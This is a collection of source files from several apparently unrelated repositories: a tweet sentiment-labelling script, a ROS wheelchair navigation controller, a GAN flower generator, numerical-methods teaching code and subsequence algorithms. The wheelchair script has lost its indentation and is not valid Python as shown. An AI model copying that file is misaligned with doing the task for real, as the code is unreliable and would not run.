    df['cleaned_tweet'] = df.cleaned_tweet.map(lambda x: regex.sub('', x).lower())
df = df.reset_index()
df = df.drop('index',axis=1)
t1 = NamedTemporaryFile()
t2 = NamedTemporaryFile()
t3 = NamedTemporaryFile()
df.tweet.to_csv(t1.name,encoding='utf-8',index=False)
df.cleaned_tweet.to_csv(t2.name,encoding='utf-8',index=False)
subprocess.call('curl --data-binary @{} "http://www.sentiment140.com/api/bulkClassify" > {}'.format(t1.name,t3.name),shell=True)
pols = pd.read_csv(t3.name,header=None)
df['polarity'] = pols[0]
subprocess.call('curl --data-binary @{} "http://www.sentiment140.com/api/bulkClassify" > {}'.format(t2.name,t3.name),shell=True)
pols = pd.read_csv(t3.name,header=None)
df['polarity_cl'] = pols[0]
t1.close()
t2.close()
t3.close()
df.to_csv(fname,encoding='utf-8')
``` |
{
"source": "joshgreen5157/ros_wheelchair",
"score": 2
} |
#### File: Robotics Code 2021/scripts/rviz_nav.py
```python
import os
import time
import rospy
import serial
import pickle
import actionlib
import subprocess as sp
import multiprocessing as mp
from std_msgs.msg import String
from geometry_msgs.msg import PoseStamped,Twist, PoseWithCovarianceStamped, Pose2D
from actionlib_msgs.msg import GoalStatusArray
from move_base_msgs.msg import MoveBaseAction
# Launch ROS process
def ROSProcess():
sp.run('roslaunch navigation hector_map.launch', shell = True, check = True, stdout = sp.PIPE, stderr = sp.STDOUT)
# Establish serial communication with external device
def setupComPort(comPort):
serialPort = serial.Serial(port = comPort, baudrate = 9600, bytesize=8, timeout=2, stopbits=serial.STOPBITS_ONE)
return serialPort
# Create necessary global variables
COM = setupComPort("/dev/ttyACM0")
serialCounter = 0
cancelBool = False
freeze = "False"
# Clear the map on rViz (NOT CURRENTLY IN USE, IF USED ALLOW TIME FOR MAP TO REPOPULATE)
def clearMap():
print("Clearing MAP")
clear_publisher = rospy.Publisher("syscommand", String, queue_size=5)
msg = "reset"
clear_publisher.publish(msg)
# send a new target goal to rViz (NOT CURRENTLY IN USE)
def setGoal(msg):
goal_publisher = rospy.Publisher("move_base_simple/goal", PoseStamped, queue_size=5)
goal = PoseStamped()
if msg.pose != goal.pose:
writeCommand(COM, 'a')
goal.header.seq = 1
goal.header.frame_id = "map"
goal.header.stamp = rospy.Time.now()
goal.pose = msg.pose
goal_publisher.publish(goal)
time.sleep(2)
# Translate the desired command and assign it the proper numeric value
def translateCommands(target):
global COM
lineA = float(target.linear.x)
lineB = float(target.angular.z)
if lineA> 0:
lineA = lineA+210
elif lineA< 0:
lineA = lineA+100
elif lineA == 0:
lineA = 135
if lineB> 0:
lineB = lineB+155
elif lineB< 0:
lineB = lineB+112
elif lineB == 0:
lineB = lineB+135
lineA = 'A' + str(int(lineA))
lineB = 'B' + str(int(lineB))
print('x = ',target.linear.x,'a = ', lineA)
print('y = ',target.angular.z,'b = ', lineB)
writeCommand(COM, lineA)
writeCommand(COM, lineB)
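# --- Hedged reference sketch (added; not part of the original script) ---
# The same velocity-to-serial mapping used in translateCommands above, factored
# out without the serial side effects so the offsets are easy to read; 135 is
# the neutral value for both channels. The helper name _map_velocity is ours.
def _map_velocity(linear_x, angular_z):
    a = 135 if linear_x == 0 else (linear_x + 210 if linear_x > 0 else linear_x + 100)
    b = 135 if angular_z == 0 else (angular_z + 155 if angular_z > 0 else angular_z + 112)
    return 'A' + str(int(a)), 'B' + str(int(b))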
# Format the desired command and send it over the open COM port
def writeCommand(comPort, strvar):
comPort.write(str.encode(strvar + '*'))
# Translate and send velocity commands received from rViz, flush serial line every 25 messages sent to prevent overloading
def navCommandsReceived(poses):
global COM
global freeze
global serialCounter
if freeze == "False":
translateCommands(poses)
if serialCounter == 25:
COM.flushInput()
COM.flushOutput()
serialCounter = 0
serialCounter = serialCounter+1
# When a new target goal is received, send an 'a' command to put the wheelchair in autonomous mode
def newGoalReceived(target):
global COM
global cancelBool
cancelBool = True
writeCommand(COM,'a')
time.sleep(.5)
writeCommand(COM,'a')
# When the target location is reached, send a DONE command and clear the goal from Rviz
def targetReached(status):
global COM
global cancelBool
if status.status_list != []:
if status.status_list[0].status == 3 and cancelBool == True:
print('Target reached')
writeCommand(COM, 'DONE')
move_base = actionlib.SimpleActionClient('/servicebot/move_base', MoveBaseAction)
move_base.cancel_all_goals()
cancelBool = False
# Check the camera output for Wheelchair Freeze command
def checkCamera(pose):
global freeze
global COM
    if os.path.getsize("/home/max/shared.pkl") > 0:
        with open("/home/max/shared.pkl", "rb") as fp:
            freeze = pickle.load(fp)
if freeze == "True":
print('checkCamera ', freeze)
stopWheelchair()
# Send Stop command to wheelchair
def stopWheelchair():
global COM
writeCommand(COM, 'A135')
writeCommand(COM, 'B135')
# Looping listener for ROS Topics
def listener():
global freeze
rospy.init_node('listener',anonymous=True)
rospy.Subscriber('/pose2D', Pose2D, checkCamera)
rospy.Subscriber('/move_base_simple/goal', PoseStamped, newGoalReceived)
rospy.Subscriber('/cmd_vel', Twist, navCommandsReceived)
rospy.Subscriber('/move_base/status', GoalStatusArray, targetReached)
rospy.spin()
# Launch ROS and rVIZ, start listener process
def main():
p = mp.Process(target=ROSProcess)
p.start()
time.sleep(10)
l = mp.Process(target=listener)
l.start()
# sp.run('mark3.py', shell = True, check = True, stdout = sp.PIPE, stderr = sp.STDOUT)
time.sleep(5)
print('Ready for target location')
p.join()
l.join()
if __name__ == '__main__':
print('Start navigation script')
main()
``` |
{
"source": "JoshGreenslade/Flowers",
"score": 2
} |
#### File: Flowers/models/flower_generator.py
```python
import joblib
import numpy as np
from PIL import Image
from keras.models import load_model
import keras
import os
import hashlib
print('agrg?')
class FlowerGen():
def __init__(self):
self.generator = load_model('./models/saved_models/DCGAN_V1.h5')
self.clf = joblib.load('./models/saved_models/refiner_SVC.joblib')
self.noise = np.random.normal(loc=0,scale=1,size=(1,100))
self.lasthash = None
self.get_new_noise()
self.gen_new_image()
def get_new_noise(self):
self.noise = np.random.normal(loc=0,scale=1,size=(1,100))
while self.clf.predict_proba(self.noise)[0,1] < 0.5:
self.noise = np.random.normal(loc=0,scale=1,size=(1,100))
def gen_new_image(self):
img = self.generator.predict(self.noise)[0] * 0.5 + 0.5
image = Image.fromarray((img*255).astype('uint8'))
md5hash = hashlib.md5(image.tobytes()).hexdigest()
image.save(f'./static/images/{md5hash}.png')
if self.lasthash is not None:
os.remove(f'./static/images/{self.lasthash}.png')
else:
pass
self.lasthash = md5hash
self.get_new_noise()
return f'images/{self.lasthash}.png'
if __name__ == '__main__':
flowergen = FlowerGen()
flowergen.gen_new_image()
flowergen.gen_new_image()
``` |
{
"source": "josh-gree/NumericalMethods",
"score": 3
} |
#### File: NumericalMethods/Labs/lab1_convergence.py
```python
import numpy
from matplotlib import pyplot
from lab1_integral_7 import integral
def f_2(x):
return numpy.sqrt(1.0-x**2)
I_2_exact = numpy.pi/4
Nstrips_all = 2**numpy.arange(10, 20)
widths = 1.0 / Nstrips_all
errors = numpy.zeros_like(widths)
for i, Nstrips in enumerate(Nstrips_all):
I_2_approx = integral(f_2, Nstrips)
errors[i] = abs(I_2_exact - I_2_approx)
pyplot.loglog(widths, errors, marker='x', label = r"$I_2$")
pyplot.ylabel("Error")
pyplot.xlabel("Strip width")
pyplot.legend(loc="upper left")
pyplot.show()
```
#### File: NumericalMethods/Labs/lab1_integral_2.py
```python
import lab1_integral1
def integral_4(Nstrips):
"""
The first integral: integrate x between 0 and 1.
"""
width = 1/Nstrips
integral = 0
for point in range(Nstrips):
height = (point / Nstrips)
integral = integral + width * height
return integral
def integral_total(Nstrips):
"""
The total integral.
"""
return integral_4(Nstrips) + lab1_integral1.integral_1(Nstrips)
print("Total using one hundred strips:", integral_total(100))
```
#### File: NumericalMethods/Labs/lab1_integral4.py
```python
def f_x_squared(x):
"""
Square the input
"""
return x**2
def integral_2(f, Nstrips):
"""
The general integral: f(x) between 0 and 1.
"""
width = 1/Nstrips
integral = 0
for point in range(Nstrips):
location = point / Nstrips
height = f(location)
integral = integral + width * height
return integral
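# --- Hedged usage sketch (added; not part of the original lab file) ---
# Left-hand Riemann sum of x**2 over [0, 1]; the exact value is 1/3, so the
# approximation improves as Nstrips grows.
if __name__ == "__main__":
    for n in (10, 100, 1000):
        print(n, "strips:", integral_2(f_x_squared, n))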
```
#### File: tex/codes/bisection.py
```python
import numpy
def bisection(f, interval, eps_abs = 1e-10, max_step = 100):
"""
Use bisection to find x such that f(x) = 0.
"""
x_lo, x_hi = interval
x = (x_lo + x_hi) / 2.0
f_lo = f(x_lo)
if (abs(f_lo) < eps_abs):
return x_lo
f_hi = f(x_hi)
if (abs(f_hi) < eps_abs):
return x_hi
#assert(f_lo*f_hi < 0), "f(Endpoints) must change sign!"
if f_lo*f_hi > 0:
print("Warning! f(endpoints) have same sign!")
f_mid = f(x)
step = 0
while (step < max_step) and abs(f_mid) > eps_abs:
step += 1
if f_lo * f_mid < 0.0:
x_hi = x
f_hi = f(x_hi)
else:
x_lo = x
f_lo = f(x_lo)
x = (x_lo + x_hi) / 2.0
f_mid = f(x)
return x
if __name__ == "__main__":
def f(x):
return numpy.exp(x) + x - 2
def g(x):
return numpy.sin(x**2) - 0.1 * x
interval = [0, 1]
s = bisection(f, interval)
print("s = {}, f(s) = {}".format(s, f(s)))
for lower in range(1,9):
interval = [lower, 10]
try:
s = bisection(g, interval)
print("interval = [{}, 10], s = {}, g(s) = {}".format(lower, s, g(s)))
except:
pass
```
#### File: tex/codes/lecture14.py
```python
import numpy
from matplotlib import pyplot
def forward_difference(f, x0, h):
return (f(x0+h) - f(x0)) / h
def backward_difference(f, x0, h):
return (f(x0) - f(x0-h)) / h
def central_difference(f, x0, h):
return (f(x0+h) - f(x0-h)) / (2*h)
def euler(f, x_end, y0, N):
x, dx = numpy.linspace(0, x_end, N+1, retstep=True)
y = numpy.zeros((len(y0),N+1))
y[:,0] = y0
for n in range(N):
y[:,n+1] = y[:,n] + dx * f(x[n], y[:,n])
return x, dx, y
if __name__=="__main__":
h = 0.5
print("Forward difference, h=",h, "y'=",
forward_difference(numpy.exp, 0, h))
print("Backward difference, h=",h, "y'=",
backward_difference(numpy.exp, 0, h))
print("Central difference, h=",h, "y'=",
central_difference(numpy.exp, 0, h))
h = 0.05
print("Forward difference, h=",h, "y'=",
forward_difference(numpy.exp, 0, h))
print("Backward difference, h=",h, "y'=",
backward_difference(numpy.exp, 0, h))
print("Central difference, h=",h, "y'=",
central_difference(numpy.exp, 0, h))
h_all = 0.5/2**numpy.arange(1,10)
errors_forward = numpy.zeros_like(h_all)
errors_backward = numpy.zeros_like(h_all)
errors_central = numpy.zeros_like(h_all)
for i, h in enumerate(h_all):
errors_forward[i] = abs(1 - forward_difference(numpy.exp, 0, h))
errors_backward[i] = abs(1 - backward_difference(numpy.exp, 0, h))
errors_central[i] = abs(1 - central_difference(numpy.exp, 0, h))
pyplot.figure(figsize=(12,6))
pyplot.loglog(h_all, errors_forward, 'kx', label="Forward")
pyplot.loglog(h_all, errors_backward, 'bo', label="Backward")
pyplot.loglog(h_all, errors_central, 'r^', label="Central")
pyplot.loglog(h_all, h_all/h_all[0]*errors_forward[0], 'b-',
label=r"$\propto h$")
pyplot.loglog(h_all, (h_all/h_all[0])**2*errors_central[0], 'g-',
label=r"$\propto h^2$")
pyplot.xlabel(r"$h$")
pyplot.ylabel("Error")
pyplot.legend(loc="upper left")
pyplot.show()
def f_sin(x, y):
return -numpy.sin(x)
print("Euler's Method")
x, dx, y = euler(f_sin, 0.5, [1], 5)
print("dx=", dx, "y(0.5)=", y[0,-1])
x, dx, y = euler(f_sin, 0.5, [1], 50)
print("dx=", dx, "y(0.5)=", y[0,-1])
Npoints = 5*2**numpy.arange(1,10)
dx_all = 0.5/Npoints
errors = numpy.zeros_like(dx_all)
for i, N in enumerate(Npoints):
x, dx, y = euler(f_sin, 0.5, [1], N)
errors[i] = abs(y[0,-1] - numpy.cos(0.5))
dx_all[i] = dx
pyplot.figure(figsize=(12,6))
pyplot.loglog(dx_all, errors, 'kx')
pyplot.loglog(dx_all, errors[0]*(dx_all/dx_all[0])**1, 'b-',
label=r"$\propto \Delta x$")
pyplot.legend(loc='upper left')
pyplot.xlabel(r"$\Delta x$")
pyplot.ylabel("Error")
pyplot.show()
def f_circle(x, y):
dydx = numpy.zeros_like(y)
dydx[0] = -y[1]
dydx[1] = y[0]
return dydx
y0 = numpy.array([1, 0])
x, dx, y = euler(f_circle, 50, y0, 500)
pyplot.figure(figsize=(8,8))
pyplot.plot(y[0,:], y[1,:])
pyplot.show()
x, dx, y = euler(f_circle, 50, y0, 5000)
pyplot.figure(figsize=(8,8))
pyplot.plot(y[0,:], y[1,:])
pyplot.show()
```
#### File: tex/codes/lecture18.py
```python
import numpy
from matplotlib import pyplot
def euler_pc(f, x_end, y0, N):
x, dx = numpy.linspace(0, x_end, N+1, retstep=True)
y = numpy.zeros((len(y0),N+1))
y[:,0] = y0
for n in range(N):
fn = f(x[n], y[:,n])
yp = y[:,n] + dx * fn
y[:,n+1] = y[:,n] + dx / 2 * (fn + f(x[n+1], yp))
return x, dx, y
def ab2(f, x_end, y0, N):
x, dx = numpy.linspace(0, x_end, N+1, retstep=True)
y = numpy.zeros((len(y0),N+1))
fn = numpy.zeros((len(y0),N+1))
y[:,0] = y0
fn[:,0] = f(x[0], y[:,0])
x_epc, dx_epc, y_epc = euler_pc(f, dx, y0, 1)
y[:,1] = y_epc[:,1]
for n in range(1,N):
fn[:,n] = f(x[n], y[:,n])
y[:,n+1] = y[:,n] + dx * (3 * fn[:,n] - fn[:,n-1]) / 2
return x, dx, y
def milne(f, x_end, y0, N):
x, dx = numpy.linspace(0, x_end, N+1, retstep=True)
y = numpy.zeros((len(y0),N+1))
fn = numpy.zeros((len(y0),N+1))
y[:,0] = y0
fn[:,0] = f(x[0], y[:,0])
x_epc, dx_epc, y_epc = euler_pc(f, dx, y0, 1)
y[:,1] = y_epc[:,1]
for n in range(1,N):
fn[:,n] = f(x[n], y[:,n])
yp = y[:,n] + dx * (3 * fn[:,n] - fn[:,n-1]) / 2 #AB2 predictor
fp = f(x[n+1], yp)
y[:,n+1] = y[:,n-1] + dx * (fp + 4 * fn[:,n] + fn[:,n-1]) / 3
return x, dx, y
if __name__=="__main__":
def f_exp(x, y):
return -y
x, dx, y_ab2 = ab2(f_exp, 30, [1], 3000)
pyplot.figure(figsize=(12,6))
pyplot.plot(x, y_ab2[0,:])
pyplot.ylim(-1.1,1.1)
pyplot.xlabel(r"$x$")
    pyplot.ylabel("AB2")
pyplot.show()
x, dx, y_milne = milne(f_exp, 30, [1], 3000)
pyplot.figure(figsize=(12,6))
pyplot.plot(x, y_milne[0,:])
pyplot.ylim(-1.1,1.1)
pyplot.xlabel(r"$x$")
pyplot.ylabel("Milne")
pyplot.show()
```
#### File: tex/codes/lecture20.py
```python
import numpy
import matplotlib
from matplotlib import pyplot
from scipy.optimize import fsolve
matplotlib.rcParams.update({'font.size':18, 'figure.figsize':(10,6)})
def relax_dirichlet(p, q, f, interval, bcs, N):
x, dx = numpy.linspace(interval[0], interval[1], N+2, retstep=True)
x_interior = x[1:-1]
A = numpy.zeros((N,N))
F = numpy.zeros((N,))
y = numpy.zeros((N+2,))
for i in range(N):
A[i,i] = dx**2 * q(x_interior[i]) - 2
if i>0:
A[i,i-1] = 1 - dx/2 * p(x_interior[i])
if i<N-1:
A[i,i+1] = 1 + dx/2 * p(x_interior[i])
F[i] = dx**2 * f(x_interior[i])
F[0] = F[0] - bcs[0] * (1 - dx/2 * p(x_interior[0]))
F[-1] = F[-1] - bcs[-1] * (1 + dx/2 * p(x_interior[-1]))
y_interior = numpy.linalg.solve(A, F)
y[0] = bcs[0]
y[1:-1] = y_interior
y[-1] = bcs[-1]
return x, y
def relax_blackbox(f, bcs, N):
x, dx = numpy.linspace(0, 1, N+2, retstep=True)
def residual(y):
y[0] = bcs[0]
y[-1] = bcs[-1]
dy = (y[2:] - y[:-2]) / (2*dx)
res = numpy.zeros_like(y)
res[1:-1] = y[:-2] + y[2:] - 2*y[1:-1] - dx**2 * f(x[1:-1], y[1:-1], dy)
return res
y_initial = numpy.zeros_like(x)
y = fsolve(residual, y_initial)
return x, y
def relax_newton(f, dfdy, dfddy, bcs, N):
x, dx = numpy.linspace(0, 1, N+2, retstep=True)
y = numpy.zeros_like(x)
y_old = numpy.ones_like(x)
step = 0
while numpy.linalg.norm(y-y_old) > 1e-10 and step < 100:
y_old = y.copy()
step = step + 1
y[0] = bcs[0]
y[-1] = bcs[-1]
x_interior = x[1:-1]
y_interior = y[1:-1]
dy = (y[2:] - y[:-2]) / (2*dx)
residual = y[:-2] + y[2:] - 2*y[1:-1] - dx**2 * f(x[1:-1], y[1:-1], dy)
J = numpy.zeros((N,N))
for i in range(N):
J[i,i] = -2 - dx**2*dfdy(x_interior[i], y_interior[i], dy[i])
if i>0:
J[i,i-1] = 1 + dx/2*dfddy(x_interior[i], y_interior[i], dy[i])
if i<N-1:
J[i,i+1] = 1 - dx/2*dfddy(x_interior[i], y_interior[i], dy[i])
y_new_interior = y_interior + numpy.linalg.solve(J, -residual)
y[1:-1] = y_new_interior
return x, y
if __name__=="__main__":
def p(x):
return numpy.ones_like(x)
def q(x):
return numpy.zeros_like(x)
def f(x):
return -numpy.ones_like(x)
x_exact = numpy.linspace(0, 1, 1000)
x, y = relax_dirichlet(p, q, f, [0, 1], [0, 1], 5)
pyplot.plot(x, y, 'kx', mew=2)
pyplot.plot(x_exact, 2*numpy.exp(1)/(numpy.exp(1)-1)*(1-numpy.exp(-x_exact))-x_exact)
pyplot.xlabel(r"$x$")
pyplot.show()
pyplot.plot(x, y-(2*numpy.exp(1)/(numpy.exp(1)-1)*(1-numpy.exp(-x))-x))
pyplot.xlabel(r"$x$")
pyplot.show()
def f_nonlinear(x, y, dy):
return -1/(1+y**2)
def dfdy_nonlinear(x, y, dy):
return 2*y/(1+y**2)**2
def dfddy_nonlinear(x, y, dy):
return numpy.zeros_like(x)
x, y = relax_blackbox(f_nonlinear, [0, 0], 50)
pyplot.plot(x, y, 'k--')
pyplot.show()
x, y = relax_newton(f_nonlinear, dfdy_nonlinear, dfddy_nonlinear,
[0, 0], 50)
pyplot.plot(x, y, 'k--')
pyplot.show()
```
#### File: tex/codes/lecture4.py
```python
import numpy
def lu(A):
n = len(A)
L = numpy.zeros_like(A)
U = numpy.zeros_like(A)
for k in range(n):
L[k, k] = 1.0
U[k, k] = (A[k, k] - numpy.dot(L[k, :], U[:, k])) / L[k, k]
for row in range(k+1, n):
L[row, k] = (A[row,k] - numpy.dot(L[row,:],U[:,k])) / U[k, k]
for col in range(k+1, n):
U[k, col] = (A[k,col] - numpy.dot(L[k,:],U[:,col])) / L[k, k]
return L, U
if __name__=="__main__":
A = numpy.array([[1.0, 2.0, 3.0],
[4.0, 5.0, 6.0],
[7.0, 8.0, 0.0]])
b = numpy.array([[1.0], [2.0], [3.0]])
L, U = lu(A)
print(A)
print(L)
print(U)
print(numpy.dot(L, U))
# Compare this against the result on the slides
A = numpy.array([[2.0, 1.0,-1.0],
[4.0, 1.0, 0.0],
[-2.0,-3.0,8.0]])
print(A)
L, U = lu(A)
print(L)
print(U)
print(numpy.dot(L, U))
```
#### File: tex/codes/lecture6.py
```python
import numpy
from matplotlib import pyplot
def bisection(f, interval, max_steps=100, tol=1e-10):
x_lo, x_hi = interval
x = (x_lo + x_hi)/2
f_lo = f(x_lo)
f_hi = f(x_hi)
fx = f(x)
steps = 0
while steps < max_steps and abs(fx) > tol and (x_hi - x_lo) > tol:
steps = steps + 1
if fx*f_hi < 0: # Root lies in right-hand half
x_lo = x
f_lo = fx
else: # Root lies in left-hand half
x_hi = x
f_hi = fx
x = (x_lo + x_hi) / 2
fx = f(x)
print("Nsteps", steps)
return x
if __name__=="__main__":
def f(x):
return numpy.exp(x) + x - 2
def g(x):
return numpy.sin(x**2) - 0.1*x
interval = [0,1]
s = bisection(f, interval)
print("s = ", s, "f(s) = ", f(s))
x = numpy.linspace(0, 10, 1000)
pyplot.plot(x, g(x))
pyplot.show()
s = bisection(g, [1,10])
print("s = ", s, "g(s) = ", g(s))
s = bisection(g, [1,9])
print("s = ", s, "g(s) = ", g(s))
s = bisection(g, [1,8.5])
print("s = ", s, "g(s) = ", g(s))
s = bisection(g, [1,8])
print("s = ", s, "g(s) = ", g(s))
```
#### File: tex/codes/lecture8.py
```python
import numpy
def functional_iteration(f, x0, max_steps=100, tol=1e-10):
x = numpy.zeros(max_steps+1)
x[0] = x0
step = 0
g = lambda x : x - f(x)
while abs(f(x[step])) > tol and step < max_steps:
step = step + 1
x[step] = g(x[step-1])
return x[:step+1]
def chord(f, x0, m, max_steps=100, tol=1e-10):
x = numpy.zeros(max_steps+1)
x[0] = x0
step = 0
g = lambda x : x - m * f(x)
while abs(f(x[step])) > tol and step < max_steps:
step = step + 1
x[step] = g(x[step-1])
return x[:step+1]
def newton(f, df, x0, max_steps=100, tol=1e-10):
x = numpy.zeros(max_steps+1)
x[0] = x0
step = 0
g = lambda x : x - f(x) / df(x)
while abs(f(x[step])) > tol and step < max_steps:
step = step + 1
x[step] = g(x[step-1])
return x[:step+1]
def secant(f, x0, x1, max_steps=100, tol=1e-10):
x = numpy.zeros(max_steps+1)
x[0] = x0
x[1] = x1
step = 1
while abs(f(x[step])) > tol and step < max_steps:
step = step + 1
x[step] = x[step-1] - f(x[step-1]) * (x[step-1] - x[step-2]) / \
(f(x[step-1]) - f(x[step-2]))
return x[:step+1]
if __name__=="__main__":
def f(x):
return x - numpy.cos(x)
def df(x):
return 1 + numpy.sin(x)
x_func_iteration = functional_iteration(f, 0)
print("Functional iteration")
print("s={}, f(s)={}, in {} steps".format(x_func_iteration[-1],
f(x_func_iteration[-1]), len(x_func_iteration)))
x_chord = chord(f, 0, 1.08)
print("Chord, m=1.08")
print("s={}, f(s)={}, in {} steps".format(x_chord[-1],
f(x_chord[-1]), len(x_chord)))
x_chord = chord(f, 0, 0.8)
print("Chord, m=0.8")
print("s={}, f(s)={}, in {} steps".format(x_chord[-1],
f(x_chord[-1]), len(x_chord)))
x_newton = newton(f, df, 0)
print("Newton")
print("s={}, f(s)={}, in {} steps".format(x_newton[-1],
f(x_newton[-1]), len(x_newton)))
x_secant = secant(f, 0, 1)
print("Secant")
print("s={}, f(s)={}, in {} steps".format(x_secant[-1],
f(x_secant[-1]), len(x_secant)))
```
#### File: NumericalMethods/Worksheets/Worksheet1_Answers.py
```python
def MatrixConditionCheck(A):
import numpy as np
MaxConditionNumber = 10 # This is absurdly low
ConditionNumber = np.linalg.cond(A)
if ConditionNumber > MaxConditionNumber:
print "Condition number of matrix\n", A, "\ntoo large (bigger than", MaxConditionNumber, ").\n"
import numpy as np
print "\nQuestion 1\n"
A1 = np.array([[1,2],[3,4]])
A1T = np.transpose(A1)
A1I = np.linalg.inv(A1)
print "The matrix\n", A1, "\nhas transpose\n", A1T, "\nand inverse\n", A1I
A2 = np.array([[-3,2],[3,6]])
A2T = np.transpose(A2)
A2I = np.linalg.inv(A2)
print "The matrix\n", A2, "\nhas transpose\n", A2T, "\nand inverse\n", A2I
print "\nQuestion 2\n"
v1 = np.array([1,3,-1])
v2 = np.array([1,-2])
v3 = np.array([1,6,-3,1])
print "The vector\n", v1, "\nhas norms", np.linalg.norm(v1,1), np.linalg.norm(v1,2), np.linalg.norm(v1,np.inf)
print "The vector\n", v2, "\nhas norms", np.linalg.norm(v2,1), np.linalg.norm(v2,2), np.linalg.norm(v2,np.inf)
print "The vector\n", v3, "\nhas norms", np.linalg.norm(v3,1), np.linalg.norm(v3,2), np.linalg.norm(v3,np.inf)
print "The matrix\n", A1, "\nhas norms", np.linalg.norm(A1,1), np.linalg.norm(A1,np.inf)
print "The matrix\n", A2, "\nhas norms", np.linalg.norm(A2,1), np.linalg.norm(A2,np.inf)
print "\nQuestion 3\n"
MatrixConditionCheck(A1)
MatrixConditionCheck(A2)
print "\nQuestion 4\n"
# Bisection algorithm
tolerance = 1e-15
# Define the function
f = lambda x: np.tan(x) - np.exp(-x)
# Define the interval
x_min = 0.0
x_max = 1.0
# Values at the ends of the domain
f_min = f(x_min)
f_max = f(x_max)
assert(f_min * f_max < 0.0)
# The loop
x_c = (x_min + x_max) / 2.0
f_c = f(x_c)
iteration = 0
while ((x_max - x_min > tolerance) and (np.abs(f_c) > tolerance) and (iteration < 100)):
iteration = iteration+1
if f_min * f_c < 0.0:
x_max = x_c
f_max = f_c
else:
x_min = x_c
f_min = f_c
x_c = (x_min + x_max) / 2.0
f_c = f(x_c)
# print "Iteration ", iteration, " x ", x_c, " f ", f_c
print "The root is approximately ", x_c, " where f is ", f_c
``` |
{
"source": "josh-gree/poly2poly",
"score": 2
} |
#### File: src/data/projections.py
```python
from numpy import pi, exp ,log, vstack, newaxis, array
import odl
def prj_factory(Nx,Ny,Np,Nd,ret_A=False):
'''
returns cuda fwd and bwd projectors for given 2d geometry.
Inputs
Nx,Ny -> voxels in x and y dims
Np -> number of angles
Nd -> number of det elements
Outputs
fwd -> forward projector, calculates Ax
Input Nx*Ny matrix
Output Np*Nd matrix
bwd -> backward projector, calculates A^Tx
Input Np*Nd matrix
Output Nx*Ny matrix
'''
reco_space = odl.uniform_discr([0, 0],[1, 1], [Nx, Ny],dtype='float32')
angle_partition = odl.uniform_partition(0, 2 * pi, Np)
detector_partition = odl.uniform_partition(-0.1, 1.1, Nd)
geometry = odl.tomo.Parallel2dGeometry(angle_partition, detector_partition)
ray_trafo = odl.tomo.RayTransform(reco_space, geometry, impl='astra_cuda')
fwd = lambda X : ray_trafo(X).asarray()
bwd = lambda X : ray_trafo.adjoint(X).asarray()
return fwd, bwd
def multi_mono_prj(fwd_bwd,X):
'''
monoprojection for each energy, calculates AX or A^TX
Inputs
fwd_bwd -> fwd or bwd projection operator should be viable for shape of x
This will come from prj_factory
x -> poly energy image (Ne x Nx x Ny)
Outputs
out -> basically this is AX or A^TX
'''
if len(X.shape) == 2:
out = fwd_bwd(X)
return out
Ne = X.shape[0]
out = vstack([fwd_bwd(X[i,...])[newaxis,...] for i in range(Ne)])
return out
def poly_projection(fwd,X,I):
'''
calculates -log(ZI), where Z = exp(-AX)
'''
if not I.shape:
I = array([I])
Z = exp(-multi_mono_prj(fwd,X))/I.sum()
out = -log((Z*I[:,newaxis,newaxis]).sum(axis=0))
return out
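# --- Editor's usage sketch (not part of the original module): poly_projection only
# --- needs *some* linear fwd operator, so a toy stand-in is enough to exercise the
# --- -log(sum_e I_e exp(-A x_e) / sum(I)) formula above without odl/ASTRA installed.
# --- toy_fwd, X_toy and I_toy are illustrative names, not part of the module API.
if __name__ == "__main__":
    toy_fwd = lambda img: img.sum(axis=0)[newaxis, :]  # fake single-angle projector
    X_toy = array([[[0.1, 0.2], [0.3, 0.4]],
                   [[0.2, 0.1], [0.4, 0.3]]])          # (Ne, Nx, Ny) attenuation images
    I_toy = array([0.7, 0.3])                          # two-bin source spectrum
    sino = poly_projection(toy_fwd, X_toy, I_toy)
    print(sino.shape)                                  # -> (1, 2)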
``` |
{
"source": "joshgrib/2017S-coursework",
"score": 4
} |
#### File: cs370a/20170306/subStr.py
```python
def LCS(s1, s2):
if len(s1) is 0 or len(s2) is 0:
return 0
if s1[0] == s2[0]:
return 1 + LCS(s1[1:], s2[1:])
return max(LCS(s1, s2[1:]), LCS(s1[1:], s2))
#print LCS("hello", "world")
#print LCS("", "world")
#print LCS("hello", "")
#print LCS("abdez", "bed")
def fast_LCS(s1, s2):
def fast_LCS_helper(s1, s2, memo):
if (s1, s2) in memo:
return memo[(s1, s2)]
if len(s1) is 0 or len(s2) is 0:
result = 0
elif s1[0] == s2[0]:
result = 1 + fast_LCS_helper(s1[1:], s2[1:], memo)
else:
result = max(fast_LCS_helper(s1, s2[1:], memo), fast_LCS_helper(s1[1:], s2, memo))
memo[(s1, s2)] = result
return result
return fast_LCS_helper(s1, s2, {})
#print fast_LCS("hello", "world")
#print fast_LCS("", "world")
#print fast_LCS("hello", "")
#print fast_LCS("abdez", "bed")
#print fast_LCS("abdezafsdnklafsdf", "bedsadfsfapfda")
def LCS_with_values(s1, s2):
if len(s1) is 0 or len(s2) is 0:
return (0, '')
if s1[0] == s2[0]:
result = LCS_with_values(s1[1:], s2[1:])
return (1+result[0], s1[0]+result[1])
use_s1 = LCS_with_values(s1[1:], s2)
use_s2 = LCS_with_values(s1, s2[1:])
if use_s1[0]>use_s2[0]:
return use_s1
return use_s2
#print LCS_with_values("hello", "world")
#print LCS_with_values("", "world")
#print LCS_with_values("hello", "")
#print LCS_with_values("abdez", "bed")
"""CHALLENGE
Instead of longest COMMON subsequence,
get the longest INCREASING subsequence
Strictly increasing - no duplicates
"""
def LIS_LCS_helper(s1, s1sorted):
if len(s1) is 0:
return 0
if s1[0] == s1sorted[0]:
return 1 + LCS(s1[1:], s1sorted[1:])
return LCS(s1[1:], s1sorted[1:])
def LIS(s1):
return LCS(s1, sorted(s1))
#count = int(input())
#inp = [0] * count
#for i in range(count):
# inp[i] = int(input())
#print LIS2(inp)
print LIS("abcdfyzaldhs")
print LIS([15, 27, 14, 38, 26, 55, 46, 65, 85])
print LIS([2, 7, 4, 3, 8])
arr = [1, 2, 6, 3, 14, 7, 10, 9, 0, 12]
def LIS2(arr):
dp = [1] * len(arr)
index = 1
while (index < len(arr)):
subindex = index - 1
while (subindex >= 0):
if arr[index] > arr[subindex]:
dp[index] = max(dp[index], 1 + dp[subindex])
subindex -= 1
index += 1
return dp[len(arr) - 1]
print LIS2("abcdfyzaldhs")
print LIS2([15, 27, 14, 38, 26, 55, 46, 65, 85])
print LIS2([2, 7, 4, 3, 8])
```
#### File: cs370a/20170320/increasing_subsequence.py
```python
exInLen = 5
exIn = [2, 7, 4, 3, 8]
exOut = 3
def LIS(arr):
